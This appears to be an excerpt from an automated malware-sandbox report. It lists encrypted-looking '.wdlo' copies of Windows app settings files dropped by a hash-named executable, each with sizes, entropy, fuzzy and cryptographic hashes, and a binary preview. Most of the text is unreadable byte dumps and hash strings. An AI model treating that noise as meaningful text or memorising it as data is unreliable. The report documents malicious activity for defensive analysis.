                  SHA-256:48EF4B0E2C3265BBBA0D8EAA80D309DE8789F120CA72BBE74062308B14760E4D
                  SHA-512:4079AEBE66F6B2C88168A0C9B455445166E01AA4A9302798B725782EC332A46975FD82B835DB306031B95A3477EC9000AB3EBCB488CEF635CC1171AE069F9625
                  Malicious:false
                  Preview:regf...&&..........O......N.k.2.6...H._..ni...<....wm.....0.K.V.^.E.?.|~,..}..Cs.4..7...I5W.....Ai.7..-.4..Y...c.".B..pMr..Il/.`V..]...........V.?WD....S..W.wB.5.]....Qx.-..b.....'Qw.Z...j..}@..^~u.SZ..... 7......@....o... ".|3....|.D...Uf.Y..]./A.`.......*..,?....t.....s..`D.w....&....~E._.4.........?R..3.)... }.={~.S..z.M....8.11..C.d...K......E<..5.K.*.OO. ^.V.;rE..E_.u..'.Q.R..}Z4...,......N.DmJp.......H..;..v.J..e......eD.....q......j>n.o6..@.5.p..u..E>[...U-U.......C;..../.b($....\....^........)_.<1m!....y.....d.A.n& ..~"..Z.J.B.u.Y....rA..tY,.w..c.S7.[!.../..(f.M.CV..Af=..X..k.....w^.#....:.....C..K..)....=M...\.1.....i...B.[.......eDx.;.nB..,.3%q.6...y;a..y..=k.........q,.DhZcA.....m.2..HH..a..G.r....7d..N.P..!...f(..I......a..6...y..8.Kh......O.a.a...q...e..,2.0.}...:ycDk.3m..e...H.q}<$.._...d.......2.B!......I.5.....U...).7...E....(..J1U.3..vT.P;....H.......V....aR...v...{...yE..|.r\.*;..e..Z..'.Ql..L...

                  C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.975238864039963
                  Encrypted:false
                  SSDEEP:192:palXJOY6Ka0QZlhSmAOYl9GWlRSs8Vlz9kYvGPTbEoYqb73v3:pMp/axpSmtYl9GaRSJVlz9kY+ERM
                  MD5:A06AE2F0221683ADC7CF4B5363B98755
                  SHA1:592FD1C80666E78A65A32EAC058796251ED83366
                  SHA-256:0B698B096E1884F79EBB6ECFCC84192212DEBD72F3CABA1F2A810986EDEC7DD1
                  SHA-512:843505EC8E39DDEA77E0B6B64A0629E6F68104EFA830B5D54DBE74D38B608F05E8A12A979E7C389E46B64CA82D4C999520FB753F7205407F877A36FB2FFF4881
                  Malicious:false
                  Preview:regf.....-u.5...&p.....r...F.o...m... ...p.5).`.r....Z...w.1...3.......S..|..r..f[.2..cK.E..3j.iuI..X..0....nk.*C|....(...0...B..a.G..X..p].2~.L%.......v.y.<>ee.. .....!=:....u...,5..Dw...KNJ.........`..6NJ......-$(*y. .b}.2C.C.* %....a....k)..s.ws.....C$...<..[..$S....O...p.).U.9.}*F...~...d...)...2.}..w....U6...Kx.!.`..5nI!..g.$..k..P......b.....`._..S=.y.z.N ..Z.f]....C.}=.*.[u.=..d.....A$.....]xN.....A...:.Xx.d.g....ip~vN..[... .}BV.=q....wB.Na...+.s(:r..3=................C\.........W....|~ k...$V.K{.....;....D...|......3>..W.....1....r.L...7..4.^.^.n....o.f..j3...@..D.@L.2./qN..v...(!Y.........^....Ye%...TX../...;?W....f4.:.B.L..$j...fP...g...$...v.VbP..y.....`.....v.H.c.a.y.-...P....6d..p...Saa...^...z....Gxz...k`..)6.'.O.|&=/...~$ @......K0XK7...Q..w..Z.......~T._Me..9..j.8g:1.i....`.....~..@p.k.....y........0Y.5..$t%..cD..[..;...U".......1..D.S2..D$.^5......IL)....:m....Xb...i|...@......5u......P.....Y.y.;...|....V.yo..Js...c?.}....

                  C:\Users\user\Local Settings\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.982128874995168
                  Encrypted:false
                  SSDEEP:192:rgmw8V44WzrIDs1xjzDJI9OAzWk/lqM50yl9JpWtFSq7E/+qXl+9+X:0IV44aMDs1xDO9D/d5Tl9JpuR/qV+9G
                  MD5:E153BCE9031879838E801A885EF505C2
                  SHA1:E90D9DD44B5B6D8EB85DA864DF73CF4BA0299C1C
                  SHA-256:5024EBEEC07CB6292B31D90E4830E5C8FD525335B25959157A84C9788C729BB7
                  SHA-512:260702F4212952225E0DA04FFD507A44282A3428AD83DA0C630E6B9B568805C901F9493E2C10AAAC1752EEE9F1CFD20A6AA70C71C9FE47960749571C141B04AF
                  Malicious:false
                  Preview:regf..%.l.....|.c..W/`...N...m.p....`.".y.^./..[H.../w.`...e..s0...b.P}..mxd.q.l..6z(.}!N93.j..[.....e....p.pU .D.7.cH..BnY..'D.U.@?.t.\..Cx.%...s*HV.%:%.Z.xv.`X.9R..U.p..r..'3ex$`y... ...9j...&...eM.#b..[.h.....?.r.^.M.'..O.8...%m.'.l.).A...<...'v..j...bB.V3j..]....8.....Ax.m.......ND.N..sI......y$2XS.B2mI.9.wG&.rv...v..A.V..u..9.".Mm.x`...?/Z.l).|\c.y..<....9..0.~...o)#..x..q...LZ..]4k......."..uC..QM$.K%+...K..(.2.{..{..~....;._...&....H.....|%.i...J9.X.x.h....M.(0.,<...m.../.............\.J\...[....B.&")...._;.7..%."..77..7)%....N...y...=.m..3:.r..+.#U..h...)^u...T}.*...9.D..`...B.\>.B....D..@.Sp~....o..5|c0....0.'..@.O.dcx.v.>..0..a.BckoE...H..;.b.+tG..\...`]+...TS.......G..-.......yH...../.3....p..uE......0.,..H!.G..I.......s...M.....Sb..'N......o;/T.}. i...d..)Ia........Z.&_..l.r].\..f{..C.qG._.L<.*!......w.5.w.&.@0.2'.Y..Wht].r75..1.......n%Iu_..I.y..3L.r.w....^n....y'.~f.:...QE.......=....%#..2D... .h%.X./...).@

                  C:\Users\user\Local Settings\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.974475977899587
                  Encrypted:false
                  SSDEEP:192:PlHZ6h7GqJpZh6fHnNtAQvK9r95C99bfIITncZ:PV8h6wpZ+nNbvOL+xq
                  MD5:8903E9D4BADC0FA378CCBC7C4585464C
                  SHA1:606A77C54A7FC955B08085897E5CD4ED2518CEE1
                  SHA-256:BEBE38A5CBEE41212D83717C3862F1081790F8A700012F132DED85DC5D194744
                  SHA-512:A83005ED2CAB6804611C4741D1398C010B4CA46E5A149E9705D41E3035B214A35E2A63C61A6ADA38D69324A305155CF920852FD63F4F6B1EF49425035021A3B0
                  Malicious:false
                  Preview:regf..(...Q\....k.C.7..$...4..R....!_B<.uY....,...!..1N..t.k.$..7ga_...2........X........F.a..}.xQm[[.D.F.\$.|...A.....a... .r...].X...s.w..%...=1M.rT..K.?......J....9C.q,3.q...-.:.Szp....D..@.Xg~].'E.B}..VI$2d,.u..B. ...r.V.....&8.....U....D.(.g.....C.K~..Y.g...Y......1g,.)-o....d]...r[....ux.U6..j)L..b...L+c........@wKnw./.I...g..M#.....]......]....o}*9..9iu50..z\....]...8.u..V.f.....b#Y..A.;N=.c..=.T....oaP.......sas7.Y....{.3n....e...&R.8r..g3n....}...x..... FB.U=.:....yY..)9i..b.7..].9..........-...e.oc...$..L,?.o.f.....v.g .[Z...#.r0.p.......&...73.Zm.$..7.+E..jc..u,.t.+<GE...d.........DWj...{....l.J.... ...!.~..a.......~^/.'.~Lr.(...a.~.S....c7.%..p`.8|.Wd.DI....0.$....c..z.2.r.^.........R...F...4.......F.9(./.m...c...c...:6R.....d.:Jt.A....`.s..w..S.C...Q..}.K....<..Z....=.I.2\.xq..........X .y)(...."......,.qdA.UV.8..e...M..g40M..Q..p.H..[o.D.gk...0.......c.^...4.Gh...=.%......A.?.....F....6X.Q..".i....w...TEL....X.w.u..9....

                  C:\Users\user\Local Settings\Packages\Microsoft.People_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.975399973039327
                  Encrypted:false
                  SSDEEP:192:oTkLr39Nw6pK8S3asD4EhhsZ672KbV2P+1waqBf2:oTw9CH8vshhhsZ6aKv1qo
                  MD5:1DB477CE572A47CE5BBB61981D7491C3
                  SHA1:4598BA0781ED94FCE9A01E773A2CAEB5A0BE3072
                  SHA-256:D85DC290461C1C1B553735727BAECF34F3C7B773AC0E1804DA1096EC51B829E0
                  SHA-512:94B74565C4A3A3F4BE48F0CF4D3D2BAD473963522B0C3879FD7E1FDA3ED1CD23E2CA5579B7DAC92351490F8F0E29FBB9815EB70928A3127EFE5921724FEC92E8
                  Malicious:false
                  Preview:regf.._Z.....l.w.]..:..i.!...`..Js...C...Y.d `...Qb..9..QM.P.QM6~'d.s.......q`.X|).5.S.....<....A.....&B.......W...e6}U...$..^pcY+^*.....6..8..J......u.Qa..T .1,q.X..1..v0.Z.`..d..@.../........b...7..rnF.V.Q.PoI@.h-^.L.y.S..D..............?hl..a]..b%.....,........<..MP....Pq..I.LJ.c... ..~../&....f.#..G7.;Y..#.x.6.$/.7...z.*&...R..?.\.~Q...qUo.J.i[.....x...4.7.Y.M.)....Jc..W..I.E..>.j.a...Y..........pt_U...t....8BO.J!<..4. cu[.....o..q/..B.ww..iR.t$.CtJQZ....YSC.>c...z^NH../.9...D.E...NOX.'...7...J...h./.....".v.pN..E3..=.X..........^..5..~.8N...Ev..D..D.9.F....R..E.4.`.>jW)..."..^c.D.{....>..J`^;.H.V...XP......k.n.=..w&.).......p..._aoy.D..R5...I..PD.\.....#.....J....-....P.K.....*.....| 4""$...Mv....-..t8.......#.....IO..No..N.r}.o.;...U.Jo..$.Yo...e...>.U..`..+Nh.M......HB.7X.~......f...Q.6.AL..B......w...E.C1b.A.........r...l..rV.....n.(5...$.........g...GwF.y...Q...3...u..)k.#.5.{SD...6~8....}.(.Pr.0~.^@..ae..W.2t.7....DF...E.R.p^.I.

                  C:\Users\user\Local Settings\Packages\Microsoft.ScreenSketch_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977505086971052
                  Encrypted:false
                  SSDEEP:192:NcMH48uatgiZn3rhNc6q3lutvlzitEo3GfjrzCBbtioQRS:Fug7jN9qVS9zfo3MuBQa
                  MD5:9D09A5C88992DB4870147645F2581801
                  SHA1:13DAB35ED6B5BDF1306CD653E00C319F167D692B
                  SHA-256:1D278D8FFA47D323BC7F97071AE72588216444877100DA4DE668F483FA7D505C
                  SHA-512:1DFAB5FDE5E01BFB3CA144C804E3DC15FB67F61137B022826EF9E4391AF733C6518C497D5857E44D2CEBCE1FB2FD13508871B642132E8DE2AF57F8B6391FB7EE
                  Malicious:false
                  Preview:regf..E.....y....dPn..D.(.F......7..#..W}}...7.}.oVQ.8...g.BR..W....^.[.._........fc.H.M...C..%...H2&.\z...~y....]..P0.%O..R.-(.......AC...{h..]....].........'2..&......N...r.3L...{9Y...Z.....5....a..3RA.....T"#J...iLf.k.|.f....U...eyQ.4C.=....jsk...B4D.x...i..X.?.%.YF.v.y.~......9pUdC.+..<...|f.?.S.5X......!:..$!..6, io.Y?..$.....bC6.O.....Z.m.'"*....Q..7./=:..P*^._].J..s.....iISL..X.A....K.t.f/..>E...sjj..{.......VW'1............Ue......|.....Q6.e..=.R..../..J.`V...D.8.u.2.E..].....e....uQ.(..../..~....N...*..C5._.....yY...H...{K.#.h........|......W. ....} @K.p6....&.d..l..f:_.P.1..E.]_...O..D...z).p.........o8^.....".. ..._..._/....?.xHK(.$..m...=....>..E....f....J.$p.[)],..../.._..w.EC-.!5o....5|2&..N .)..BJ..'..?..9Z...7?.1...?ku&l..`.z.\..%.Ir.}..$...N...U..{e..Q.?..zY.$A.+.X?y.....o]#..5.D.".....nj.Zv..w.....~....8Q......"....+.Tr*L..O.L..:ep,.12.A4l.fZ...:..\...a.g...+st..J..G.!...j.+c.....3l.>..k.>....4...m.;..&8`K...A@'..!.

                  C:\Users\user\Local Settings\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.97793626434428
                  Encrypted:false
                  SSDEEP:192:Ucjwwl0NiZcD9/LynY9yIJBoAO8pgl2JdRD3vt3OA/:UkwwlgDyYtJBn5gl2JdRD3J
                  MD5:76C956926E9129279E8E660CA042598D
                  SHA1:D0E6A8146BB1432AE7A79C1C4E136073496187BF
                  SHA-256:8CD6411351BA3C28BACFA7A2147D5BBB27FA13774512EF16FEC4D4D8213B6E82
                  SHA-512:8A95B27D036933971D8387FA22B5F26B0ED216D1EA8BF5E9465F13771AA4E40EB72D86C5F343A18E86512C50E64989FF3BC0B31BF35B8B2ED73ECCEAE589067B
                  Malicious:false
                  Preview:regf.<..R..O..;..'..#?#s.L..aG..e=..^...q..I....j-...~..........4~.j.))z.B#"......_+.F....G.....e?....1.0.Q.t[..M.C..sM.`..:<(...E...aI.Wo$-.."RP.+....%..'..!p*..f.x.$....;... r...fa.}..L6..0.-&.K#.-.... .6..7i......3!...Co@L.3..........*..j:M..p........e,E..../).A.C.,..4of.M.qp.5.=A...Iu.C..&e..x4.4h .~@m.iu.....,..46.A..g.P...I.R...5VZ...9.....Kc.(..]%.+p.x.tY.xb.p..".6s\.0.....e5..`..&....r...`.t.B....%Z{..I{*.=RB......a.a.....@IxuY8..(..O!..F..L.1>...U'lk...Rp......k5....O...o....C.2Q....|...B.:.2b....Ag...c.).k...!...?0....J^...1...t..4..U....Vb..,.H.lI4..k#.J@p..d......b{x{2xQ.2.*.:..5\....UG...=..bK..;..9..C.0...B]N...QX4...B..g.k.1.!I....N&x..HS.f.........Y..B8. .r..[.(Kd...h...r.3......u...y.KQ.[j.....Rj..4+#.8....O.@.Ib.....^......N...S...8.t...Mqn{..L_.C...(.*.I.s2..."...RA..L..m!...f.Fp~.i T.\.l%.mM.....?..r....(.S.km..h...J.T......3...^&w..U.Z*d..O.j_.%....XI.... .-Oa..I.A.1..qW.<5M...#...U.......g..v.......&9<\.\W.|=...`....

                  C:\Users\user\Local Settings\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.980263770969813
                  Encrypted:false
                  SSDEEP:192:b6m6P0ZdQlnwvlmrPpY/bpIcOL1mLruqbGK:by8ZShnpYVzO0tp
                  MD5:0D217E4FB3E9959A8A67D5665A4F5127
                  SHA1:2CB13C0799ACF9B067402E81F57F1478F9172E58
                  SHA-256:D8A431D82FC3AB0A5022519FA67563526CC9B72FCFE6FB4C25DCF5C21B3CAC89
                  SHA-512:15A261EDFE582BBC6BB61394F1DF378A2C5F30274B1EEDAFF3A5680711A21F3BEAD3BD814FD2B42F8266E60C7B308CA8A0AB01D87C7690DC459287C704A017D9
                  Malicious:false
                  Preview:regf.WyQ..u....Ux.(...^.;..?....U....Wds...\_.&..-...."H.w..Y.p7..............W%...../..b.i^.]P9:^........$.h.9.q.2..R.&E..9.*.Ja....,.e$~T...0!>...M...(c.a..{....N.....(.Z,k..Q......b7..KK.$4..w...V4.Y.,.-.....0....5.........0.:M.-kqR.uE......f/o...^...%Y......i5.*.:.!..!K......).+.F\N8.].U.c&.\?|.25.8..F......E..{/l.AZ..les..y.....(^..07p@;[!..R.X.+....'f...+.d.$...O.fP.....1...9..A....i.t..e...K.....7.7.}..J.vO..O.u..s......5._.....<.qS...'...{V. ..l...eB...+:.q.Y..d8...e... C..8..........GvU..$.is.....3W.....Z.v...mH.k.ms[&o... ....f.;.\.u!.(..0.J...o&.9.?t.../1./.q.R.@.)..%..M..\......O.,.mQHivIf!Q~r2..".ud...y.....^EN.J..Mfy.E................Q..$.....}.'..J..G)........<Mas.X.8.Y5R.......?h.\.H/.P.@.]..y...p.m|...m..........?........(...lJ...(O...B.S... /fTS.P....a.tK...-.{B...S..Z.BP........>.....9N..,.{.....h.u_..Rn....1... C.>......T)..n[!.}b..R...DE...1n.w/...3/....'f.%K....a.@*..K..N$..t...7.p5..FB?..L_..w.&......./..D..Z..U.o..

                  C:\Users\user\Local Settings\Packages\Microsoft.VP9VideoExtensions_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.981348485038577
                  Encrypted:false
                  SSDEEP:192:h64KjzqhsE4C4vlcKe7D03C/OKGf+t1LrlssnQPn:s4K9Ll7eKqOyRnWn
                  MD5:AD9147C7C144AA6B49B476DECA2F7AC5
                  SHA1:2482CD2328E4604847CFF0548FEC74F9280C038B
                  SHA-256:F9EC6160D78519B651BD66D95B486D7868AF85BCFC12AB2B9DB2EEAC16EE6EAD
                  SHA-512:1B77302055FC9E30ED7F6FD5FF061A4F62F947C001BBCD1F7344AF336287433238A62B1BC47874C79C2DA726F11370C1C0923B62FB0A029DDDCB9859A2B5993C
                  Malicious:false
                  Preview:regf...29.'M.>.q..A~g.p.5u4..............k...Ab.>.....e0....).||'..{..j.[..@...@...\m..@....%..|[.... K.HO..x+.)F.3...T.....\)....X..{.Q...9..-....a..b.).QV.Hb....6b.............e...K..<E.A98..H....).....n.c.Z..5y..R.c...++..o..._*"....1.k.>7.0E.X.~vN..).9....u.H._..\.F.A...Y./...z.\....5R'SA.3....O...L+.....L..N#a.*.0..a.p jR...Cgp..UC.z5..".ti....i..=A7.....G..._F!cn?..b.BYHg.^f.C...d.X....5...G...... .~....9.K.|..d .?...^x.+...n$F-U..;.=..dA....f....r\-........G..|{*.<.y,.._.Q.......-..g..1..$...,V....$..Z...=@....4a...Y.].R..|PW..'.CO..chn....@....6.....N.NtG.....wo.....0?.G....$UH...C>.y.l.@ ..~.4F......Hv2.P.2..[S.+-S#...~........8|.E.v|iv!.1.....pI.....=.l..T..(@..S.s8..@...f.4.*.T...opbJ..[.....S.|o...%.....L..................J.2i<...k.1..&tF0..$4;..PM..JP....i.n.H..I7.IZ.`....rx....a;9..}...K,T.N.y.FD.....[[-..0...;p.))..3...U.<w1.U.t.....Yi..T.-..d.........~.'B.y>wij.[.kK..W.K...h..{.H....D..>..WT..."..$.s.C.Q.=..l..#..8E.6![..q..JF..y.

                  C:\Users\user\Local Settings\Packages\Microsoft.Wallet_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.97592109461935
                  Encrypted:false
                  SSDEEP:192:vEIuv3WMiqP25ryXTyDonpHChuQVEsCr0x99DvVFtA/L5LM2ukHXFDQiFz/:vEVTn0BDopi8QVEe9RHtAj9umFlFz/
                  MD5:D5691182D3F4E8289EBBEC1A6DF369C1
                  SHA1:25F5755374959B0F59B6FC74EA3D94D00667F3D6
                  SHA-256:60536866F4DAE6ED4DFE506EBF382B4A54AF2E4F81443D42228F775001DE203E
                  SHA-512:ECCE9C05B0A7875EFB7CB9592A99D2F5B138067F59877E1029B59BF5F2CE8F77C7C269138C3F874422E3EC34B34FD994161448A56713F4E8E641AF49FE003A28
                  Malicious:false
                  Preview:regf..N..i8..H:.^...q..=.f...a.3...u.$F."\..4bg.<C#.T.c......q..B..........ko(Xls..3....N`~.......k;{...}......sl.*..FIJ3....m.q....h._.$.+.....kCI......;...[.7..4.D.....x.V.....I...!>.*..-.j...9dUZ..YS.......IZ.......:.l...s...y.M...@.......h......SX..m..*6...k...r...U.3..ZqkX.ET.Q.~.....].....~u*S2M9..;.5.@.......q...j..*%b...b..o......c..V.2&........S...U..9S....F:..r;..sk....*.."{'....{....T......+[....:.Z.t....D.9E..L.6.dy... .0].}....T.V..l'...\..i.`/.Q+..jQs...(.Y....z..Q.b.".!3.....7..QV........O{_.H<Gl..w..c...&.7a...M....$z..i../.W.oA.9.bD..Y4.Z8......\K.aL....=.@...k.J1.i....W7.3..B.%N...].."Dv.l3..p..!;.....#.*X.....s?.R...JR..I.Z...K....cm Os.......T[x...Q.T.6.`...sJOi.4P_.1.7sb...._..[......:...r..:2=...8Y..>.9.E...c.\+5<.e"..C...cg9W....*M.?D$..1.Y..*...@.B.......,..sP...4..6.....$e..{........"x..V..R.uzq.....|.....YZ&e.-....[sc...A..+...y.....b.j.."w...e...(..,.../).T_...O.{..lU.....(..x.5..y".:K:B.A1..a7.......Z..C..$.

                  C:\Users\user\Local Settings\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.979011177767126
                  Encrypted:false
                  SSDEEP:192:zRLSqbSlBIG0TYyyE6zXTdX5XufM51O8GMvqfQSCi6TBeBfo:IqbSB0P/6rzR1O8G4qf8TBqw
                  MD5:8AA5D4FECDA63EC21C96FB2ECC069881
                  SHA1:A5CDCE624B085213DD0AD1079CD5DA506C79103F
                  SHA-256:0778895CD7FE295D1402DC119E344262FA8F1D254B57DA250F1C89488A489200
                  SHA-512:12BE0DCED0239DA6282040C89B5F36DD8AB91AFA29259E25C854EDF167D1039FD775D8A54B6E05E8F901B0F33C8FE7369F76C30DFF4F1875C355C023657DE568
                  Malicious:false
                  Preview:regf...0yR{)4T.C....W..e....K..3.....|...slUf....s.c.q<H..X.C.P>...Ip.h%jd'2.B:.h.....]\;.F`..:.y5.s...X......T....z.ww..A.....lH....[...R0...+.b...W.eH]w....+wy.|.R........L..C...=.......k.'>z(3...s..........'.[F.pM....p...N)6.}.._...M.."...\}_..J.s{)..u.}(L:..W1d^....;...of.^5!.....,...B..U.4#..U7..Hv..u...|.......4Y|[..L....D.b.VA.()2..P..L..5.9B~.*Q..V. ..*ZP.QK.H......(D.\$.SI.....+.C..l...47.X..0..%..z._g.D......P.%so..5.MN......p.....t.n.V0.8../rC...$..r...).D...).ltbL..Z...k]....88.u~-. ".RC....}Q..0....s.S...K;...~....B...Z.(..9...f3..X..R...J..v.8.,z....h7..h.u.....&......u.....#".....*J..y.......O.-...w.....h'G.D..E....YuTz.......%}..N..4.i....3T.V.XI)'>....%........E........cN&.TR.....+.}U...a[r'.L*!c@.........x.c.*.r....\..C's.x....:..6vD.}.Z.7..C...9..vH'n._...%.:.uo4a....\..J.....|}m...#).^n..[Q..xl.....N..\.#{.r.!...T.q@..V#.$3..g..bM..........0.H.l.....r.O.....FQ...E..;m...}.?M.)...PZ..._.|...%..%zJnd(.n.b...=.!.ghy.j;

                  C:\Users\user\Local Settings\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977030532794147
                  Encrypted:false
                  SSDEEP:192:X+GbnIR5tR8Pk4SCV37EaMXmDpXtAtkFL/lC:X+GbI1mPkVq5MXmwkFrlC
                  MD5:5F5B243FBE83EC5A1C012600CFF84C65
                  SHA1:ACBC312E0409E1F4AAD8D96E568187FA4034D1FA
                  SHA-256:3DD8ED69D3217D2B97FC76F5A7A9709BEF137EBAD4B1BE7A7960687C1836F470
                  SHA-512:E4974E1EEC8AFAA831E7118DD8CE390FE4A878E6C0F0057964A28AA1DF1DE05B0FB54B261AA3B15919B003A8B9ECABF9A713C52871C932317CB39D26D036C2D4
                  Malicious:false
                  Preview:regf.[P.)..\....0...&..F...._D....Ua...|..._.E...z.s.@.o9...d..~.$N..yd..E2z.....?..HB..N.+..vw...Sz]D0wj...v.U..s...5..I.".F(..8...\yV.oc..R....G.....?8f..$..x.. . ..M.8f(.h...Sf...5..q[.....P`.Fz.9..p[.....y.1.e.8`C...........VL..e.....K..G...k...J...G..j..k.[.z.\._.:...'...4..........=...f=..\*0.......L..!.I....$.#....,....B...z..P.......x.x?..--..WN...,..m..M..1%.].o....IIl2.e#..L8s..$.;....B+...I..'..h.z.p....w...b..%.m=..).4....6.I$...>P...{.?O.\...sh...N9X.P.F'z..Z..km.....n)..0.Bh3L.UL.K..........^.....U.]...X....;8.B.?...>.Y...S..R..0.3.>7f3.[[:C.....@}...;...#..X.C;.K.....nD.\9..^j._..F1r...5'.S..O ...N1[....Z..z.[...I[.4.....)E%b.L.w'..#.f..Wq...nK.W..R.frp......aytG..1..1......5.].`r.]q..9is.\8e...{g..E[.....d..g.$:W.>...7.%.w..s[Sh<,...rO>...N.c....[B.&M.@.H(....2......].J.hG.]8.F..;!00$..)(u..%...`...{....7G.....F>..n...\;lp<..\.......e..2....T.....$*t..[.]j$...M9...U..........P z."a2@..P..l.2.~...K/.NC.+...6.sv .....@......

                  C:\Users\user\Local Settings\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9796421144124245
                  Encrypted:false
                  SSDEEP:192:BEzhPIl/1FT98I58qU+NQTusSD+cnfZkF6+n:Ozhg4VqEcnf26m
                  MD5:C73DB189EFCB51452B717F670864B7E7
                  SHA1:8AE59783257F0F1DAF16690C18CD0D0BA58FC109
                  SHA-256:69F687F22C96656E08B369972780BEF590787E4A79DE6198272C7515E1A3C450
                  SHA-512:696DBCB2C759A9362A06C7B17E9B5429A747620BC052D18B622FC2975A7AC656DC7AB85F7FD75612FF91B83482D9D1A1760103003E8D68AA898A6A6BEA52E2BC
                  Malicious:false
                  Preview:regf...Y...z'..\GD]..(..L"..........!....x..K.<........1mTR..).O@fR..$2.........'Y|..?.w"..&..NM..`W..._.4...>."l0.7.0v'5eu....Kr..s....P...+xF...S^....4A..V...6.?...F...r...kB.{.......r.s.}...>.....O.._.Y..=1...,..z..!.M.....@........E.&..y.*..............|A=.h.|.G!}2.......2...j...........I|.2..9.C...v:.].T8H.....%.%[..a.y........R.X.@...Z9A.ZV8.-..t.:.`....jnN*.\...!G..~x~...gs$.......t"..\H..Hu.....],..b,z.......j..cso.X..~..8.QR.`..W/....I)L..s.NF..R}-{.?..8'.aY...`9..WP...[F.|......O...]?.{.T.s........i.WH.v#D.LX.&.$.H.ja!.6........C.A.9.W.g.v...YzQ.v?..-.gR.,.....u....Ko.4c.@Q.5.Z.m..q..y..M.2..~q=.1V.J........#R.D..X.L...8./..'.}U.....7.]..c.K.B...."...7DaxDU..P...4m..R#......p......c.%.9;...9"M.J..5U..~..$../.\.`.8...v..Y[. p.....O....E../:.S.;....X.la-.g.T..*..V.>. .vq.Tu.....]...p.K_F.,O....<...u`.W.[9X.A.E.g..sC.oP^6.hhUz7..........*O.o..3...L..o....V[....Q/F.Qf..B...[....@h...~[...._r....*...K....d.....ic.[[.uF

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.976283379396324
                  Encrypted:false
                  SSDEEP:192:ikN6s5zPkfcyPs48kP+9TPQ49pJ/td10ZRWDL2ZSTL2:iATPkfcyPvJParNJ1IWDLL32
                  MD5:22CF57BF665801D8E7FCF14D6580BE27
                  SHA1:4E7F253A77E5B3047AA0D5B20B22F7EC29CFCA7A
                  SHA-256:0E7C88A0B89491D934DE10F3DD5552FCC528E3BDC9A74AD9B57F8B8049175720
